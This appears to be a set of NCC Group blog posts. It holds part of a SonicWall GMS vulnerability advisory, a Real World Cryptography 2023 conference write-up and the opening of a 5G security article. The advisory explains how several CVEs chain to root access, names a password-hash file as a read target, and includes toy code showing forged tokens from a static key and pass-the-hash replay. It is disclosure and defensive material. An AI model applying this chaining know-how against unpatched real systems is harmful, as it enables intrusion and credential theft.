The authentication mechanism used by the CAS Web Service (exposed via /ws/cas) did not adequately perform authentication checks, as it used a hardcoded secret value to perform cryptographic authentication checks. The CAS Web Service validated authentication tokens by calculating the HMAC SHA-1 of the supplied username. However, the HMAC secret was static. As such, an attacker could calculate their own authentication tokens, allowing them to gain unauthorised access to the CAS Web Service.
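The flaw can be illustrated in a few lines of Python (everything here is hypothetical — the key and token format are stand-ins, not SonicWall's actual values): when the HMAC key is a static value shipped inside the application, anyone who extracts it can mint a valid token for any username.

```python
import hashlib
import hmac

# Hypothetical static secret baked into every install of the application.
STATIC_KEY = b"example-static-secret"

def make_token(username: str) -> str:
    """Token scheme modelled on the advisory: HMAC-SHA-1 of the username."""
    return hmac.new(STATIC_KEY, username.encode(), hashlib.sha1).hexdigest()

def server_accepts(username: str, token: str) -> bool:
    """The server's check: recompute the HMAC and compare."""
    return hmac.compare_digest(make_token(username), token)
```

Because the server's only secret is shared with every install, a token an attacker computes for "admin" verifies exactly like a legitimate one: HMAC provides no authentication when the key is not actually secret.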

Impact

An attacker with access to the application source code (for example, by downloading a trial VM), could discover the static value used for calculating HMACs – allowing them to generate their own authentication tokens. An attacker with the ability to generate their own authentication tokens would be able to make legitimate use of the CAS API, as well as exploit further vulnerabilities within this API; for example, SQL Injection – resulting in complete compromise of the underlying host.

Post-Authenticated Command Injection – CVE-2023-34127

Title: Post-Authenticated Command Injection
Risk: 8.8 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34127
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when allowing users to search for log files on the system. This could allow an authenticated attacker to execute arbitrary code with root privileges.

Impact

An authenticated, administrative user can execute code as root on the underlying file system. For example, they could use this vulnerability to write a malicious cron job, web-shell, or stage a remote C2 payload. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Password Hash Read via Web Service – CVE-2023-34134

Title: Password Hash Read via Web Service
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34134
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

An authenticated attacker can read the administrator password hash via a web service call.

Note that whilst this issue requires authentication, it can be chained with an authentication bypass to exploit the issue from an unauthenticated perspective.

Impact

This issue can be chained with CVE-2023-34124 to read the administrator password hash from an unauthenticated perspective. Following this, an attacker could launch further post-authentication attacks to achieve Remote Code Execution.

Post-Authenticated Arbitrary File Read via Backup File Directory Traversal – CVE-2023-34125

Title: Post-Authenticated Arbitrary File Read via Backup File Directory Traversal
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34125
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when downloading backup files. This could allow an authenticated attacker to read arbitrary files from the underlying filesystem with root privileges.
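A common mitigation for this class of bug is to canonicalise the requested filename and confirm the result stays inside the intended directory. The sketch below is generic Python, not the GMS implementation, and the backup directory name is hypothetical:

```python
import os

BACKUP_DIR = "/opt/GMSVP/backups"   # hypothetical backup directory

def resolve_backup_path(filename: str) -> str:
    # Canonicalise and confirm the result stays inside BACKUP_DIR;
    # "../../etc/passwd" would otherwise escape the intended directory.
    base = os.path.realpath(BACKUP_DIR)
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([candidate, base]) != base:
        raise ValueError("path traversal attempt: %r" % filename)
    return candidate
```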

Impact

An authenticated, administrative user can read any file on the underlying file system. For example, they could read the password database to retrieve user-passwords hashes, or other sensitive information. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Upload – CVE-2023-34126

Title: Post-Authenticated Arbitrary File Upload
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34126
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when allowing users to upload files to the system. This could allow an authenticated attacker to upload files anywhere on the system with root privileges.

Impact

An authenticated, administrative user can upload files as root on the underlying file system. For example, they could use this vulnerability to upload a web-shell. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34124) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Write via Web Service (Zip Slip) – CVE-2023-34129

Title: Post-Authenticated Arbitrary File Write via Web Service (Zip Slip)
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34129
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A web service endpoint was found to be vulnerable to directory traversal whilst extracting a malicious ZIP file (a.k.a. ZipSlip). This could be exploited to write arbitrary files to any location on disk.
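The general defence against Zip Slip is to resolve each archive member's destination and reject any entry that escapes the extraction directory. The following is a minimal Python sketch of the pattern, not the GMS code (recent Python versions of zipfile already strip such components during extraction, but the same pattern applies to any extraction routine, including the Java ZIP handling a Tomcat application would use):

```python
import os
import zipfile

def safe_extract(zip_path: str, dest: str) -> None:
    # Reject entries whose resolved path escapes `dest` -- the "Zip Slip"
    # pattern, where an archive member named ../../x overwrites files
    # outside the extraction directory.
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path) as zf:
        for member in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, member.filename))
            if os.path.commonpath([target, dest_real]) != dest_real:
                raise ValueError("unsafe path in archive: %r" % member.filename)
        zf.extractall(dest_real)
```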

Impact

An authenticated attacker may be able to exploit this issue to write arbitrary files to any location on the underlying file system. These files would be written with root privileges. By writing arbitrary files, an attacker could achieve Remote Code Execution. Whilst this issue requires authentication, it could be chained with other issues, such as CVE-2023-34124 (Web Service Authentication Bypass), to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Read via Web Service – CVE-2023-34135

Title: Post-Authenticated Arbitrary File Read via Web Service
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier 
CVE Identifier: CVE-2023-34135
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A web service method allows an authenticated user to read arbitrary files from the underlying file system.

Impact

A remote attacker can read arbitrary files from the underlying file system with the privileges of the Tomcat server (root). When combined with CVE-2023-34124, this issue can allow an unauthenticated attacker to download any file of their choosing. For example, reading the /opt/GMSVP/data/auth.txt file to retrieve the administrator’s password hash.

Client-Side Hashing Function Allows Pass-the-Hash – CVE-2023-34132

Title: Client-Side Hashing Function Allows Pass-the-Hash
Risk: 4.9 (Medium) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34132
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The client-side hashing algorithm used during login was found to enable pass-the-hash attacks. As such, an attacker with knowledge of a user’s password hash could log in to the application without knowledge of the underlying plain-text password.

Impact

An attacker who is in possession of a user’s hashed password would be able to log in to the application without knowledge of the underlying plain-text password. By exploiting an issue such as CVE-2023-34134 (Password Hash Read via Web Service), an attacker could first read the user’s password hash, and then log in using that password hash, without ever having to know the underlying plain-text password.
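The underlying problem can be sketched generically: when the server stores and compares the same digest the client submits, the digest itself becomes a password-equivalent credential. This toy Python example (an illustration of the flaw class, not GMS's actual hashing scheme) shows the replay:

```python
import hashlib

def client_login_message(password: str) -> str:
    # Client-side hashing: the client hashes the password before
    # sending it, so the server only ever sees and stores the digest.
    return hashlib.sha256(password.encode()).hexdigest()

def server_verify(stored_digest: str, submitted_digest: str) -> bool:
    # The server compares digest-to-digest, so the digest is a
    # password-equivalent credential: whoever reads it can replay it.
    return stored_digest == submitted_digest

stored = client_login_message("hunter2")
# An attacker who leaks `stored` logs in without ever learning the
# plain-text password -- they simply submit the digest itself:
assert server_verify(stored, stored)
```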

Hardcoded Tomcat Credentials (Privilege Escalation) – CVE-2023-34128

Title: Hardcoded Tomcat Credentials (Privilege Escalation)
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34128
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A number of plain-text credentials were found to be hardcoded both within the application source code and within the users.xml configuration file on the GMS appliance. These credentials did not change between installs and were found to be static. Therefore, an attacker who can decompile the application source code would easily be able to discover these credentials.

Impact

An attacker with access to the Tomcat manager application (via https://localhost/) would be able to utilise the appuser account credentials to gain code execution as the root user, by deploying a malicious WAR file. As the Tomcat manager application is only exposed to localhost by default, an attacker would require an SSRF vulnerability, or the ability to tunnel traffic to the Tomcat Manager port (through SOCKS over SSH, for example). However, this could also be exploited as local privilege escalation vector in the case where an attacker has gained low privileged access to the OS (e.g., via the postgres user or snwlcli users).

Unauthenticated File Upload – CVE-2023-34136

Title: Unauthenticated File Upload
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34136
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

An unauthenticated user can upload an arbitrary file to a location not controlled by the attacker.

Impact

Whilst the location of the upload is not controllable by the attacker, this vulnerability can be used in conjunction with other vulnerabilities, such as CVE-2023-34127 (Command Injection), to allow an attacker to upload a web-shell as the root user.

Additionally, there are several functions within the GMS application which execute .sh or .bat files from the Tomcat Temp directory. An attacker could upload a malicious script file which might later be executed by the GMS (during a firmware update, for example).

Unauthenticated Sensitive Information Leak – CVE-2023-34131

Title: Unauthenticated Sensitive Information Leak
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34131
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A number of pages were found to not require any form of authentication, which could allow an attacker to glean sensitive information about the device, such as serial numbers, internal IP addresses and host-names – which could be later used by an attacker as a prerequisite for further attacks.

Impact

An attacker could leak sensitive information such as the device serial number, which could be later used to inform further attacks. As an example, the serial number is required to exploit CVE-2023-34123 (Predictable Password Reset Key). An attacker can easily glean this information by making a simple request to the device, thus decreasing the complexity of such attacks.

Use of Outdated Cryptographic Algorithm with Hardcoded Key – CVE-2023-34130

Title: Use of Outdated Cryptographic Algorithm with Hardcoded Key
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34130
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to make use of a customised version of the Tiny Encryption Algorithm (TEA) to encrypt sensitive data. TEA is a legacy block cipher which suffers from known weaknesses. Its use is discouraged in favour of AES, which provides enhanced security, is widely supported, and is included in most standard libraries (e.g. javax.crypto).

Additionally, the encryption key used by the application was found to be hardcoded within the application source code. This means that regardless of any known weakness in the encryption algorithm, or the method used to encrypt the data, an attacker with access to the source code will be able to decrypt any data encrypted with this key.
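For reference, a minimal Python implementation of standard (unmodified) TEA illustrates the point: the cipher's strength is irrelevant once the key ships in the source, because anyone holding the key can decrypt everything. The key below is a made-up placeholder, not the real hardcoded value:

```python
DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF

def tea_encrypt_block(v0, v1, key):
    # Standard TEA: 32 rounds over a 64-bit block with a 128-bit key.
    s = 0
    for _ in range(32):
        s = (s + DELTA) & MASK
        v0 = (v0 + (((v1 << 4) + key[0]) ^ (v1 + s) ^ ((v1 >> 5) + key[1]))) & MASK
        v1 = (v1 + (((v0 << 4) + key[2]) ^ (v0 + s) ^ ((v0 >> 5) + key[3]))) & MASK
    return v0, v1

def tea_decrypt_block(v0, v1, key):
    # Exact inverse of the encryption rounds, run in reverse order.
    s = (DELTA * 32) & MASK
    for _ in range(32):
        v1 = (v1 - (((v0 << 4) + key[2]) ^ (v0 + s) ^ ((v0 >> 5) + key[3]))) & MASK
        v0 = (v0 - (((v1 << 4) + key[0]) ^ (v1 + s) ^ ((v1 >> 5) + key[1]))) & MASK
        s = (s - DELTA) & MASK
    return v0, v1

# A key hardcoded in shipped source is shared by every install, so any
# ciphertext it protects is readable by anyone with the code:
HARDCODED_KEY = (0x12345678, 0x9ABCDEF0, 0x0FEDCBA9, 0x87654321)  # hypothetical
ct = tea_encrypt_block(0xDEADBEEF, 0xCAFEBABE, HARDCODED_KEY)
assert tea_decrypt_block(*ct, HARDCODED_KEY) == (0xDEADBEEF, 0xCAFEBABE)
```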

Impact

An attacker with access to the source code (for example, by downloading a trial VM), could easily retrieve the hardcoded TEA key. Using this key, the attacker could decrypt sensitive information hardcoded within the web application source code, which could aid in compromising the device.

Furthermore, by combining this issue with various other issues (such as authentication bypass and arbitrary file read), an attacker could retrieve and decrypt configuration files containing user passwords. This would ultimately allow an attacker to compromise both the application and underlying Operating System.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2023-08-24

Written by:  Richard Warren

Real World Cryptography Conference 2023 – Part II

25 August 2023 at 13:00

After a brief interlude, filled with several articles from the Cryptography Services team, we’re back with our final thoughts from this year’s Real World Cryptography Conference. In case you missed it, check out Part I for more insights.

  1. Interoperability in E2EE Messaging
  2. Threshold ECDSA Towards Deployment
  3. The Path to Real World FHE: Navigating the Ciphertext Space
  4. High-Assurance Go Cryptography in Practice

Interoperability in E2EE Messaging

A specter is haunting Europe – the specter of platform interoperability. The EU signed the Digital Markets Act (DMA) into law in September of last year, mandating that chat platforms provide support for interoperable communications. This requirement will be in effect by March of 2024, an aggressive timeline requiring fast action from cryptographic (and regular) engineers. There are advantages to interoperability: it allows users to communicate with their friends and family across platforms, and it allows developers to build applications that work across platforms. This has the potential to partially mitigate the network effects associated with platform lock-in, which could lead to more competition and greater freedom of choice for end users. However, interoperability requires shared standards, and standards tend to imply compromise. This is a particularly severe challenge for secure chat apps, which aim to provide their users with high levels of security. Introducing hastily designed, legislatively mandated components into these systems is a high-risk change which, in the worst case, could introduce weaknesses that would be difficult to fix (due to the effects of lock-in and the corresponding level of coordination and engineering effort required). This is further complicated by the heterogeneity of the field with regard to end-to-end encrypted chat: E2EE protocols vary by ciphersuite, level and form of authentication, personal identifier (email, phone number, username/password, etc.), and more. Any standardized design for interoperability would need to be able to manage all this complexity.

This presentation on work by Ghosh, Grubbs, Len, and Rösler discussed one effort at introducing such a standard for interoperability between E2EE chat apps, focused on extending existing components of widely used E2EE apps. This is appropriate as these apps are most likely to be identified as “gatekeeper” apps to which the upcoming regulations apply in force.
The proposed solution uses server-to-server interoperability, in which each end user is only required to directly communicate with their own messaging provider. Three main components of messaging affected by the DMA are identified: identity systems, E2EE protocols, and abuse prevention.

  • For the first of these items, a system for running encrypted queries to remote providers’ identity systems is proposed; this allows user identities to be associated with keys in such a way that the actual identity data is abstracted and thus could be an email, a phone number, or an arbitrary string.
  • For the second issue, E2EE encryption, a number of simple solutions are considered and rejected; the final proposal has several parts. Sender-anonymous wrappers are proposed, using a variant of Signal’s Sealed Sender protocol, to hide sender metadata; for encryption in transit, non-gatekeeper apps can use an encapsulated implementation of a gatekeeper app’s E2EE through a client bridge. This provides both confidentiality and authenticity, while minimizing metadata leakage.
  • For the third issue, abuse prevention, a number of options (including “doing nothing”) are again considered and rejected. The final design is somewhat nonobvious, and consists of server-side spam filtering, user reporting (via asymmetric message franking, one of the more cryptographically fresh and interesting parts of the system), and blocklisting (which requires a small data leakage, in that the initiator would need to share the blocked party’s user ID with their own server).

Several open problems were also identified (these points are quoted directly from the slides):

  • How do we improve the privacy of interoperable E2EE by reducing metadata leakage?
  • How do we extend other protocols used in E2EE messaging, like key transparency, into the interoperability setting?
  • How do we extend our framework and analyses to group chats and encrypted calls?

This is important and timely work on a topic which has the potential to result in big wins for user privacy and user experience; however, this best-case scenario will only play out if players in industry and academia can keep pace with the timeline set by the DMA. This requires quick work to design, implement, and review these protocols, and we look forward to seeing how these systems take shape in the months to come.

Eli Sohl

Threshold ECDSA Towards Deployment

A Threshold Signature Scheme (TSS) allows any sufficiently large subset of signers to cryptographically sign a message. There has been a flurry of research in this area in the last 10 years, driven partly by financial institutions’ needs to secure crypto wallets and partly by academic interest in the area from the Multiparty Computation (MPC) perspective. Some signature schemes are more amenable to “thresholding” than others. For example, due to linearity features of “classical” Schnorr signatures, Schnorr is more amenable to “thresholding” than ECDSA (see the FROST protocol in this context). As for thresholding ECDSA, there are tradeoffs as well; if one allows using cryptosystems such as Paillier’s, the overall protocol complexity drops, but speed and extraneous security model assumptions appear to suffer. The DKLS papers, listed below, aim for competitive speeds and minimizing necessary security assumptions:

  • DKLS18: “Secure Two-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat
  • DKLS19: “Secure Multi-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat

The first paper proposes a 2-out-of-n ECDSA scheme, whereas the second paper extends it to the t-out-of-n case. The DKLS 2-party multiplication algorithm is based on Oblivious Transfer (OT) together with a number of optimization techniques. The OT is batched, then further sped up by an OT Extension (a way to reduce a large number of OTs to a smaller number of OTs using symmetric key cryptography) and finally used to multiply in a threshold manner. An optimized variant of this multiplication algorithm is used in DKLS19 as well. The talk aimed to share the challenges that occur in practical development and deployments of the DKLS19 scheme, including:

  • The final protocol essentially requires three messages; however, the authors found they could pipeline the messages when signing multiple messages.
  • Key refreshing can be done efficiently, where refreshing means replacing the shares and leaving the actual key unchanged.
  • Round complexity was reduced to a 5-round protocol, reducing the time cost especially over WAN.
  • One bug identified by Roy in OT extensions turned out not to apply to the DKLS implementations; however, the authors are still taking precautions and moving to SoftSpoken OT.
  • An error handling mistake was found in the implementation by Riva where an OT failure error was not propagated to the top.
  • A number of bug bounties around the improper use of the Fiat-Shamir transform were seen recently. If the protocol needs a programmable Random Oracle, every (sub) protocol instance needs a different Random Oracle, which can be done using unique hash prefixes.
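The domain-separation fix mentioned in the last bullet can be sketched as follows. This is the general technique (a unique, unambiguous prefix per protocol instance), not DKLS's actual transcript hashing:

```python
import hashlib

def fs_challenge(protocol_tag: bytes, session_id: bytes, transcript: bytes) -> bytes:
    # Domain-separated Fiat-Shamir challenge: a unique prefix per
    # (sub)protocol instance gives each one an independent random oracle,
    # so a transcript from one instance cannot be replayed in another.
    h = hashlib.sha256()
    for part in (protocol_tag, session_id, transcript):
        h.update(len(part).to_bytes(8, "big"))  # length-prefix to avoid ambiguity
        h.update(part)
    return h.digest()

c1 = fs_challenge(b"DKLS-sign", b"session-1", b"commitments...")
c2 = fs_challenge(b"DKLS-sign", b"session-2", b"commitments...")
assert c1 != c2  # same transcript, different instance => different challenge
```

Length-prefixing each field also prevents ambiguity attacks where two different (tag, session, transcript) triples concatenate to the same byte string.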

The talk also discussed other gaps between theory and practice: establishing sessions, e.g., whether O(n²) QR code scans are required to set up the participant set.

Aleksandar Kircanski

The Path to Real World FHE: Navigating the Ciphertext Space

Shruthi Gorantala from Google presented The Path to Real World FHE: Navigating the Ciphertext Space. There was also an FHE workshop prior to RWC where a number of advances in the field were presented. Fully Homomorphic Encryption (FHE) allows functions to be executed directly on ciphertext, producing encrypted results that, once decrypted, match what the same functions would have produced on the plaintext. This would result in a major shift in the relationship between data privacy and data processing, as previously an application would need to decrypt the data first; FHE removes the need for the decryption and re-encryption steps. This would help preserve end-to-end privacy and allow users to have additional guarantees, such as cloud providers not having access to users’ data. However, performance is a major concern: computations on encrypted data using FHE remain significantly slower than the same computations on plaintext. Key challenges for FHE include:

  • Data size expansion,
  • Speed, and
  • Usability.
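Although true FHE schemes are far more involved, the core idea of computing on ciphertext can be illustrated with a toy Paillier example. Paillier is only *additively* homomorphic (FHE extends this idea to arbitrary circuits), and the parameters here are demo-sized, not secure:

```python
import math
import random

# Toy Paillier cryptosystem: multiplying ciphertexts adds plaintexts.
p, q = 293, 433                      # demo-sized primes; real keys are 2048+ bits
n, n2 = p * q, (p * q) ** 2
g = n + 1
lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)   # lcm(p-1, q-1)

def L(u):
    return (u - 1) // n

mu = pow(L(pow(g, lam, n2)), -1, n)  # decryption constant

def encrypt(m):
    r = random.randrange(2, n)
    while math.gcd(r, n) != 1:
        r = random.randrange(2, n)
    return (pow(g, m, n2) * pow(r, n, n2)) % n2

def decrypt(c):
    return (L(pow(c, lam, n2)) * mu) % n

# "Compute on ciphertext": a server multiplies two ciphertexts it
# cannot read; the decrypted result is the sum of the plaintexts.
assert decrypt((encrypt(20) * encrypt(22)) % n2) == 42
```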

The focus of the presentation was on presenting a model of FHE hierarchy of needs that included both deficiency and growth needs. FHE deficiency needs are the following:

  • FHE Instruction Set which focuses on data manipulation and ciphertext maintenance.
  • FHE Compilers and Transpilers which focuses on parameter selection, optimizers and schedulers.
  • FHE Application Development which focuses on development speed, debugging and interoperability.

The next phase would be FHE growth needs:

  • FHE Systems Integration and Privacy Engineering which includes threat modeling.
  • FHE used as a critical component of privacy enhancing technologies (PETs).
  • A key current goal for FHE is to reduce the computational overhead for an entire application, to demonstrate FHE’s usefulness in practical real-world settings.

Javed Samuel

High-Assurance Go Cryptography in Practice

Filippo Valsorda, the maintainer of the cryptographic code in the Go language since 2018, presented the principles at work behind that maintenance effort. The title above is from the RWC program, but the first presentation slide contained an updated title which might be clearer: “Go cryptography without bugs”. Indeed, the core principle of it is that Filippo has a well-defined notion of what he is trying to achieve, that he expressed in slightly more words as follows: “secure, safe, practical, modern, in this order”. This talk was all about very boring cryptography, with no complex mathematics; at most, some signatures or key exchanges, like we already did in the 1990s. But such operations are what actually gets used by applications most of the time, and it is of a great practical importance that these primitives operate correctly, and that common applications do not misuse them through a difficult API. The talk went over these principles in a bit more details, specifically about:

  • Memory safety: use of a programming language that at least ensures that buffer overflows and use-after-free conditions cannot happen (e.g., Go itself, or Rust).
  • Tests: many test vectors, to try to exercise edge cases and other tricky conditions. In particular, negative test vectors are important, i.e., verifying that invalid data is properly detected and rejected (many test vector frameworks are only functional and check that the implementation runs correctly under normal conditions, but this is cryptography and in cryptography there is an attacker who is intent on making the conditions very abnormal).
  • Fuzzing: more tests designed by the computer trying to find unforeseen edge cases. Fuzzing helps because handcrafted negative test vectors can only check for edge conditions that the developer thought about; the really dangerous ones are the cases that the developer did not think about, and fuzzing can find some of them.
  • Safe APIs: APIs should be hard to misuse and should hide all details that are not needed. For instance, when dealing with elliptic curves, points and scalars and signatures should be just arrays of bytes; it is not useful for applications to see modular integers and finite field elements and point coordinates. Sometimes it is, when building new primitives with more complex properties; but for 95% of applications (at least), using a low-level mathematics-heavy API is just more ways to get things wrong.
  • Code generation: for some tasks, the computer is better at writing code than the human. Main example here is implementation of finite fields, in particular integers modulo a big prime; much sorrow has ensued from ill-controlled propagation of carries. The fiat-crypto project automatically generates proven correct (and efficient) code for that and Go uses said code.
  • Low complexity: things should be simple. The more functions an API offers, the higher the probability that an application calls the wrong one. Old APIs and primitives, that should normally no longer be used in practice, are deprecated; not fully removed, because backward compatibility with existing source code is an important feature, but still duly marked as improper to use unless a very good reason to do so is offered. Who needs to use plain DSA signatures or the XTEA block cipher nowadays? Some people do! But most are better off not trying.
  • Readability: everything should be easy to read. Complex operations should be broken down into simpler components. Readability is what makes it possible to do all of the above. If code is unreadable, it might be correct, but you cannot know it (and usually it means that it is not correct in some specific ways, and you won’t know it, but some attacker might).
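The emphasis on negative test vectors can be made concrete with a toy parser: functional tests alone would pass even if the malformed inputs below were silently accepted. (Python is used here for brevity; the principle is language-agnostic and applies equally to the Go code under discussion.)

```python
def parse_record(buf: bytes) -> bytes:
    # Minimal length-prefixed record parser: a 2-byte big-endian length,
    # then exactly that many payload bytes, with nothing trailing.
    if len(buf) < 2:
        raise ValueError("truncated header")
    n = int.from_bytes(buf[:2], "big")
    if len(buf) != 2 + n:
        raise ValueError("length mismatch")
    return buf[2:]

# Positive vector: well-formed input parses.
assert parse_record(b"\x00\x03abc") == b"abc"

# Negative vectors: malformed inputs must be rejected, not silently
# accepted -- this is what functional-only test suites tend to miss.
for bad in (b"", b"\x00", b"\x00\x04abc", b"\x00\x02abc"):
    try:
        parse_record(bad)
        raise AssertionError("accepted malformed input: %r" % bad)
    except ValueError:
        pass
```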

An important point here is that performance is not a paramount goal. In “secure, safe, practical, modern”, the word “fast” does not appear. Cryptographic implementations have to be somewhat efficient, because “practical” implies it (if an implementation is too slow, to the point that it is unusable, then it is not practical), but the quest for saving a few extra clock cycles is pointless for most applications. It does not matter whether you can do 10,000 or 20,000 Ed25519 signatures per second on your Web server! Even if that server is very busy, you’ll need at most a couple dozen per second. Extreme optimization of code is an intellectually interesting challenge, and in some very specialized applications it might even matter (especially in small embedded systems with severe operational constraints), but in most applications that you could conceivably develop in Go and run on large computers, safety and practicality are the important features, not speed of an isolated cryptographic primitive.

Thomas Pornin

Real World Cryptography 2024

NCC Group’s Cryptography Services team boasts a strong Canadian contingent, so we were excited to learn that RWC 2024 will take place in Toronto, Canada on March 25–27, 2024. We look forward to catching up with everyone next year!

5G security – how to minimise the threats to a 5G network

28 August 2023 at 01:00

To ensure the security of new 5G telecom networks, NCC Group has been providing guidance, conducting code reviews, red team engagements and pentesting 5G standalone and non-standalone networks since 2019. As with any network, different attackers have different motivations. An attacker could aim to gain information about subscribers on an operator’s network by targeting signalling, to access customers’ private data such as billing records, to take control of the management network, or to take down the network. In most cases, the main avenue of attack is via the management layer into the core network – either utilising the operator’s support personnel or via a 3rd-party vendor. In all cases attacking a 5G network will take a number of weeks or months, with the main group of attackers being Advanced Persistent Threat (APT) groups. Many governments around the world, including the UK government, are legislating and demanding that operators and vendors reduce telecoms security gaps to ensure a resilient 5G network.

But many operators are unclear on the typical threats and how they could affect their business or if they do at all. Many companies are understandably investing significant time and effort into testing and reviewing threats to make sure they adhere to the compliance requirements.

Here, we aim to cover some of the main issues we have discovered during our pentesting and consultancy engagements with clients and explain not only what they are but how likely the threat is to disrupt the 5G network.

Background

Any typical 5G network deployment, be it a Non-Standalone (NSA) or Standalone (SA) core, can have various security threats or risks associated with it. These threats can be exploited via either known vulnerabilities (e.g. default credentials) or unknown ones (e.g. zero days). Primarily, the main focus of any attack is via the existing core management network, be it through a malicious insider or an attacker who has leveraged access to a suitably high-level administrator account or utilised default credentials. We have seen this first-hand with red-teaming attacks against various operators. Secondary attack vectors are via insecure remote sites hosting RAN infrastructure, which in turn allow access to the core network via the management network. Various mechanisms (i.e. firewalls, IDS etc.) are put in place to manage these risks, but vulnerable networks and systems have to be tested thoroughly to limit attacks. Having a good understanding of the 5G network topology and associated risks/threats is key, and NCC Group has the necessary experience and knowledge to scope and deliver this testing.

